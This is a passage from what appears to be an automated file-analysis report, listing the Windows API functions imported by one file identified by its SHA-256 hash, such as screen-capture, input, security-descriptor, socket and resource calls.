\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetACP\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetStringTypeW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"HeapCreate\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrcpyA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"VirtualQuery\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"Sleep\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ShellExecuteA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetProcessWindowStation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetUserObjectInformationA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetActiveWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetTokenInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ChangeServiceConfigA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"AddAccessAllowedAce\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetUserNameA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InitializeAcl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetLengthSid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetFileSecurityA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetSecurityDescriptorSacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DeleteDC\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SelectObject\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetDIBits\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"BitBlt\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateCompatibleDC\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DeleteObject\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateCompatibleBitmap\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetDriveTypeA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetStdHandle\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EnumResourceLanguagesA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"MoveFileA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FindClose\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"BeginUpdateResourceA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UpdateResourceA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetVolumeInformationA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetThreadPriority\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateThread\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetPriorityClass\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EndUpdateResourceA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ExitThread\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetDateFormatA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CompareStringW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrcmpA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetTimeFormatA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FindNextFileA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GlobalLock\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GlobalUnlock\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LockResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCurrentThread\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FreeResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UuidToStringA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RpcStringFreeA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UuidCreate\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SHGetPathFromIDListA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SHGetSpecialFolderLocation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SHGetMalloc\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetFocus\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EmptyClipboard\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetMessageA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EnumWindows\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SendInput\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"PostQuitMessage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindowRect\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DispatchMessageA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UpdateWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"EnumChildWindows\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindowDC\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LookupIconIdFromDirectoryEx\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCursorPos\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ReleaseDC\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetWindowTextA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UnregisterClassA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetClipboardData\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"IsWindowVisible\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindowPlacement\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetClientRect\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetCursorPos\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RegisterClassA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DestroyWindow\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFileVersionInfoSizeA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFileVersionInfoA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"VerQueryValueA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"__WSAFDIsSet\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"htons\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"inet_addr\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"inet_ntoa\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"getpeername\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"closesocket\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"gethostbyaddr\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"WSAGetLastError\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CopySid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSecurityDescriptorControl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetAclInformation\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSidSubAuthority\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSecurityDescriptorGroup\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"MakeAbsoluteSD\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSecurityDescriptorOwner\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"IsValidSid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSecurityDescriptorDacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSecurityDescriptorSacl\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InitializeSid\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"AddAce\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSidLengthRequired\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"IsValidSecurityDescriptor\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetUserDefaultUILanguage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"OutputDebugStringW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetEvent\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetVersionExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"lstrlenW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetCommandLineW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SearchPathW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"MapViewOfFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateFileMappingW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RaiseException\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemDefaultUILanguage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FindResourceExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LocalFree\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"FormatMessageW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LoadLibraryW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateEventW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"OpenEventW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetThreadUILanguage\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetFullPathNameW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"GetSystemWindowsDirectoryW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SysStringLen\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SysAllocStringLen\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SysAllocString\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"SysFreeString\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CommandLineToArgvW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"LoadStringW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"DispatchMessageW\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RtlAllocateHeap\"; File: 